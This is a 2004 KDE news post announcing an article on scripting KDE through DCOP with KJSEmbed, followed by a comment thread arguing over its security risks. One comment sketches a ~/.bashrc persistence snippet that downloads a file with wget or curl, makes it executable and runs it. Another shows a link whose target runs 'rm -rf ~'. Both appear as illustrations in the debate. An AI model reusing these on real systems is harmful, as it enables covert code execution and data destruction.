---
title: "Automating Your Desktop with KJSEmbed"
date:    2004-04-19
authors:
  - "igeiser"
slug:    automating-your-desktop-kjsembed
comments:
  - subject: "great stuff"
    date: 2004-04-19
    body: "Just saw this too: http://www.kdedevelopers.org/node/view/427"
    author: "KDE User"
  - subject: "Any chance?"
    date: 2004-04-19
    body: "Any chance for unstable kjsembed releases or even snapshots from cvs (that rely on kdelibs 3.2.x not kdelibs-cvs)?\n"
    author: "anon"
  - subject: "Re: Any chance?"
    date: 2004-04-19
    body: "this will work with kde 3.2.  its a matter of getting a source snapshot of KDE bindings from head.  We are currently debating an release in a few weeks to help people who wish to start using KJSEmbed now.  In fact I really want a release so I can add <a href=\"http://www.kdedevelopers.org/node/view/424\">this</a> to www.kde-apps.org.\n\nIt needs latest CVS because I fixed a bug where QBoxLayouts didn't work.  Stay tuned.  Worst case Rich or I can make this available on our websites.\n\n\n"
    author: "Ian Reinhart Geiser"
  - subject: "Security"
    date: 2004-04-20
    body: "While I'm pretty confident about KDE developers, I wonder how close this mimics WSH and Windoze scripting, and if this could raise security concerns...\n\nFor example, I believe JS embedded in e-mails should be able to do stuff into the mail itself, but never be able to access mail client functionality (Addressbook access, harvest address from another mails, sending mails, etc.), and of course shouldn't be able to access functionality from another parts of the system.\n"
    author: "Shulai"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "No, JS in emails should not be allowed (and I'm sure it won't be by the KMail developers).  Sandboxing sounds nice in theory, but it's impossible to get perfect in practice.  It's a humongous security hole waiting to happen and there's no good reason for it.  Mouseovers in your HTML mail are not a good reason.  If you want to send something that includes code, send it as an attachment and make people execute it manually.  JS in webpages is bad enough, but at least you have to go and visit a site to execute the code, so you have some say in what does and doesn't get executed.  If JS in emails got executed automatically, anybody could make people execute arbitrary JS code just by sending it to them in an email and waiting for them to view it.  Any security hole in JS immediately becomes remotely exploitable on an arbitrary target system, with no user action required other than checking email."
    author: "Spy Hunter"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "What about website abusing KJSEmbed to run malicious JavaScript/DCOP\nto install spyware on your KDE box ?\n\nFor instance, having your spyware run everytime you run KDE...\n\nIt's nice to see features but I see some problem \nhere if not done security wise.\n\nWhat about root users running KDE viewing some website or email\nand then getting infected without notice ?!\n\nInfected like installing a SPAM server, installing rootkits, etc.\n\nBe careful!"
    author: "fprog"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "What about not working as root at all?\n"
    author: "Anonymous"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "Come on, u dont need to be root to have installed spyware, what about rewriting bashrc, or something like that ??\n\nGet the idea? "
    author: "GaRaGeD"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "How will rewriting a bashrc of a user allow to install a rootkit?"
    author: "Anonymous"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "echo -e \"\nhex version of #!/bin/bash\nif -e ~/run then\n~/run\nelse\nwget ... >>/dev/null\ncurl ... >>/dev/null\nchmod 755 ~/run\n~/run\nfi\n\" >> ~/.bashrc\n\nRootkit are to be run as non-root to gain root,\ninstall crapt in some case, open ports, remove all trace,\nmake your box a slave...\n\n\n"
    author: "security101"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "The security risks associated with KJSEmbed are no greater than those for Perl, Python or any other programming language. KJSEmbed merely uses the Javascript interpreter  which is traditionally used by Konqueror. KJSEmbed is totally separate from Konqueror, KHTML and KMail. Nothing has changed in that respect.\n\nEveryone claim down. The KHTML developers haven't lost their minds (anymore than usual =) )\n\n--\nSimon"
    author: "Simon Edwards"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "My goal wass not to spread FUD or fear, \nI just want to make sure that people are security concious period.\n\nI admit, I haven't read the entire KDE CVS to look how it's implemented,\njust read the article and few about it.\n\nPerl or Python are executed from webpage on the server not locally (no risk),\nwhile JavaScript is executed on the client not on the server.\n\nMaybe with a KIO-Fuse or io-cmd slave...\n\nhttp://wiki.kdenews.org/tiki-pagehistory.php?page=KIO+Fuse+Gateway&diff=4\nhttp://www.unormal.org/kde-debian/swriter_gimp_fuse-kio-gateway.png\n\nNow, how you get KIO-Fuse from Konqueror, you probably can't... \n\nHowever, someone else wasn't that cautious:\nhttp://www.kde-apps.org/content/show.php?content=11014\n\n<a href=\"cmd: \\rm -rf ~\">click me (not really!)</a>\n\n\"KJSEmbed merely uses the Javascript interpreter \nwhich is traditionally used by Konqueror.\"\n\nOkay, now if it uses the same \"interpreter\" \nhow does that same \"interpreter\" is isolated from DCOP ?\nSomeone pointed into the \"sandbox\" feature, how does it work?\n\nIs there any regular \"testing\" done upon every release to ensure\nno security risk are presents?\n\nMainly DCOP calls don't work in Konqueror/KHTML/KMail?\n\nThe best way is \"education\", show, describe, write webpages\ndescribing why it's \"impossible\". \n\nBugs appears often when people discover them\nand wouldn't be please no more than anyone else 2 years from now\nwhen a bug would allow such... and people exploiting it!\n\nFor what its worth, I love KDE, I think it's a great environment,\nbut I think it's worth being a bit more cautious about what's get in.\n"
    author: "fprog26"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "JavaScript is never and will never be interpreted by KMail (or more precisely by the KHTML part that KMail uses)."
    author: "Ingo Kl\u00f6cker"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "You are automatically associating Javascript with Internet. This is wrong, however.\nJavascript is just a scripting language like any other. Absolutely no differences - except, that JS is often used in webbrowsers. The security problems are only caused by this kind of usage (untrusted sources and the resulting need for error prone sandboxing).\n\nIn the case of KJSembed, JS is used as a regular local scripting language. All scripts have to be on disk, and are executed like any other script or programm. KJSembed is a separate interpreter, having absolutely no connection to KHTML or Kmail. It is used just like Bash, Python or Perl by setting a script's first line to \"#!/usr/bin/kjsembed\".\n\nOf cource, you can write a malicious script using KJSembed, just like you could write a Bash script doing \"rm -rf ~/\" or a C Programm doing the same.\n"
    author: "Marc Ballarin"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "Thanks for the clarification.\n\n"
    author: "fprog26"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "I know the about your urge to promote fear of any platform that KDE supports, but please refrain from outright lies.\n\nFacts:\n1) KJSEmbed scripts must be run of the local file system. Since you obviously have no clue how KDE operates Ill let you know that KMail attachments, Webpages etc. are not a local file system.\n\n2) KRun (the thing that starts stuff up) cannot run scripts on click*.  This is a bug, it will be able to run scripts in 3.3 that are marked executable by the file system.  So again you lose, a script must be downloaded, and chmod +x to even run.\n\n3) KDE doesn't introduce any new holes that UNIX has not had for the last 30 years in respects to shell scripts.  We are just allowing GUI applications to be automated the way CLI apps have been for years.\n\nSo please in the future put your FUD somewhere more useful than KDE.  We have no time for ignorant chicken little's who love to yell the sky is falling as loud as we can.\n\n*This is not totally true but its not worth explaining the details of that here, refer to the kde-core-devel list."
    author: "Ian Reinhart Geiser"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "It's only similarity is that it is a script engine....  please research this stuff before posting or go back to slushdot.\n\nThis adds absolutely no more risk than say python, perl or even bash shell do to linux.  How many python viruses do we have out there?  Oh in the last 30 years how many shell viruses have we seen?  Hmmm maybe 0 at last count?  You might think if there where a way to spread a script virus on unix they would have found it in the last 30 years, right?\n\nAll in all while your FUD is amusing to me personally, it's not helping the spread of our platform.  If you wish to give input please, I beg you to at least research and learn the architecture before spreading fear and doubt about the platform.  I have been fighting these lame arguments with dcop for years, I would think people here like KDE enough to not spread FUD like this."
    author: "Ian Reinhart Geiser"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "It's easy to understand why people might be concerned having only read the news item. Take this extract:\n\n\"These bindings allow people to create scripts that can tightly integrate into KDE quickly with simple JavaScript.\"\n\nAlarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of \"integration\" Microsoft are well known for.\n\n\"This article covers how to use the DCOP API from KJSEmbed and sports a simple demo script that shows off how to use this API.\"\n\nNote that without an understanding of how this JavaScript gets run (remembering that for most people, JavaScript runs in the browser), and with no mention of sandboxes in the face of this DCOP integration, the casual reader is going to be slightly concerned.\n\nNow I know that people have to read your article to understand what's really going on here, and I haven't even read your article yet, but then I do know what KJSEmbed is about. The news item could be the first many people have heard/read about your work - I'd argue that a better first impression could dampen down some of that unnecessary criticism."
    author: "The Badger"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "And by that logic is perfectly for me to walk into a crowded theater and without looking for any fire alarms i should yell as loud as possible \"we could all die in a fire here because there are no fire alarms!\"\n\nplease, don't promote your own knee jerk reactions.  you not only look foolish, but you scare people who may have less of a clue about what is going on than you.  This is truly a disservice to Open Source because you undermine the platform by spreading FUD that can propogate for years."
    author: "Ian Reinhart Geiser"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "I don't follow your \"logic\" at all. Remember that news items like this one get syndicated widely, either via RDF/RSS or by page \"mining\". All it takes is for someone to see a badly presented/summarised piece of technology in a news feed and they're going to react exactly as people have in the earlier comments.\n\nAll I was doing was explaining the phenomenon, but if you want to throw your hands up in disbelief every time it happens, feel free to do so!\n\nBTW, a more apt analogy is you meeting a group of strangers, introducing yourself with the phrase \"I eat turtles\" (when you do not and never have considered doing so) and then being surprised that you're subsequently known as \"the turtle eater\"."
    author: "The Badger"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "well it revolves around the central issue that you refuse to understand what you are talking about... thats all.\n\nthis isn't slashdot, we can read the articles before we respond."
    author: "Ian Reinhart Geiser"
  - subject: "Re: Security"
    date: 2004-04-21
    body: ">this isn't slashdot, we can read the articles before we respond.\n\nThis one made my day ;)"
    author: "Mathieu Chouinard"
  - subject: "Re: Security"
    date: 2004-04-22
    body: "\"Alarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of \"integration\" Microsoft are well known for.\"\n\nI can understand well reasoned but ill-informed comments. This is just bollocks. Try and understand how Microsoft implements scripting first. It doesn't have to be that way, and it won't."
    author: "David"
  - subject: "Re: Security"
    date: 2004-04-20
    body: "> How many python viruses do we have out there?\n\nAt least one ;)\nhttp://epidemic.ws/biannual.html"
    author: "michele"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "At least 9 Perl virus, 4 PHP virus and 1 Python virus\nwithout looking extensively... on Google!\n\nhttp://www.google.com/search?q=perl+virus\n\n1) http://www.macman.net/files/viriiANDtrojans/perl_virus.txt\n2) http://www.rohitab.com/discuss/static/topic-3-7-839-10.html\n3) http://securityresponse.symantec.com/avcenter/venc/data/perl.dir.worm.html\n\nhttp://www.antiviraldp.com/virus_list/list_9.htm\n\n3) PERL.DirWorm; \n4) PERL.Intender; \n5) PERL.Nirvana; \n6) PERL.Qwax; \n7) PERL.Rans; \n8) PERL.Spoon; \n9) PERL.Tict; \n\nhttp://www.google.com/search?q=php+virus\n1) PHP.Alf; \n2) PHP.Neworld; \n3) PHP.Pirus; \n4) PHP.Redz; \n\n2) http://www.theregister.co.uk/2001/01/05/first_php_virus_found/\n3) http://php.weblogs.com/discuss/msgReader$273\n\n\nhttp://www.google.com/search?q=python+virus\n1) http://epidemic.ws/biannual.html\n"
    author: "fprog26"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "Few more links on Shell Virus from Google:\n\nhttp://www.google.com/search?q=shell+virus\nhttp://www.google.com/search?q=shell+virus+unix\n\nhttp://www.virusbtn.com/magazine/archives/200204/malshell.xml\nhttp://www.xfocus.org/documents/200306/1.html\nhttp://www.net-security.org/virus_news.php?id=55\nhttp://gizm0.shacknet.nu/07.txt\n"
    author: "fprog26"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "you forgot the most common unix virus though.  \nhttp://diveintomark.org/archives/2002/05/16/hi_im_a_signature_virus_add_me_to_your_signature_and_watch_me_spread\n\n\ni have to admit in the last 21 years on a computer ive seen more Amiga viruses than Unix ones =)  The point i was attempting to make is how many viruses have you _seen_.  Id be hard pressed past trojans installed as parts of root kits that no-one has seen these in the wild.\n\namusing none the less."
    author: "Ian Reinhart Geiser"
  - subject: "Re: Security"
    date: 2004-04-21
    body: "Scripting like this is no more of a risk, and will add great functionality. Please don't confuse this with Windoze scripting. Microsoft in their infinite wisdom decided to expose the whole of Windows to the outisde world through scripting and ActiveX. That should not give scripting itself a bad name."
    author: "David"
  - subject: "Re: Security"
    date: 2004-04-22
    body: "IMHO the largest problem with windows scripting is their lack of concept of the execute bit.  Because of this they treat every file that is a script as an executable.  So click on a web link with a exe it runs... click on an exe in an email, again it runs....  scary man.\n\nKDE has a sane group of developers and Unix architecture makes it easier for us to do things right.  We can make the scripts easy for users to use, but harder to shoot themselves in the feet with.\n\nThe only thing we have to fear from scripting integration in KDE is increased usabilaty and more functionality that will make things like KDE prime time!"
    author: "Ian Reinhart Geiser"
  - subject: "Safe Tcl"
    date: 2004-04-22
    body: "Tcl has a version that can be loaded into a browser so you can\nembed tcl in your code for client-side execution. The Tcl guys thought\nabout this and made it so that the Tcl code does not allow any file system\naccess. In fact, there is a list of things that are turned off. The user must\nturn on the things that will be tolerated. But the default is that the worst\nthe code could do is destroy it's own window.\n\nI would suggest looking at the Tcl 'safe interpreter' layout for useful pointers in this respect."
    author: "Roger Oberholtzer"
  - subject: "Re: Safe Tcl"
    date: 2004-04-22
    body: "I think there has already been sufficent research and implementations of secure and sandboxed javascript interpreters.  :)"
    author: "Evan \"JabberWokky\" E."
  - subject: "Re: Safe Tcl"
    date: 2004-04-23
    body: "Yes, but Safe Tcl has been around for *ages*, whereas a lot of people only wised up to sandboxed execution well after Java came out.\n\nOn another subject related to undone homework, I'd like to refer you to RFC 1521 (http://www.ietf.org/rfc/rfc1521.txt) where a search for \"security considerations\" will provide some interesting insights. Section 7.4.2 is especially interesting in the light of recent vulnerabilities in various PostScript viewers (http://dot.kde.org/1049927346/).\n\nOf course, the most interesting thing about RFC 1521 is the date. I guess that all those \"sufficient research and implementations\" were all in vain."
    author: "The Badger"
  - subject: "Re: Safe Tcl"
    date: 2004-04-22
    body: "I would suggest maybe going out on a limb and researching before you speak, but hey I'm pragmatic, what can I say.\n\na) This is not in a browser.\nb) We have the ability to \"create a list of things to turn off\"\n\nThis isn't rocket science people."
    author: "Ian Reinhart Geiser"
---
Ian Geiser at SourceXtreme, Inc has posted the second in a <a href="http://www.sourcextreme.com/presentations/KJSEmbed/">series of articles</a> on development with KJSEmbed. <a href="http://xmelegance.org/kjsembed/">KJSEmbed</a> is the KDE JavaScript engine with bindings for Qt/KDE.  These bindings allow people to create scripts that can tightly integrate into KDE quickly with simple JavaScript.  This article covers how to use the DCOP API from KJSEmbed and sports a simple demo script that shows off how to use this API.  This article covers the bleeding edge version of KJSEmbed from CVS because of new features that were added soon after the release of KDE 3.2. The goal is to give people an overview of the new technology and to allow developers to become aware of the new scripting options. Both developers and non-developers are encouraged to <a href="http://www.sourcextreme.com/presentations/KJSEmbed/dcop_automation.html">check out the new article</a>.
<!--break-->
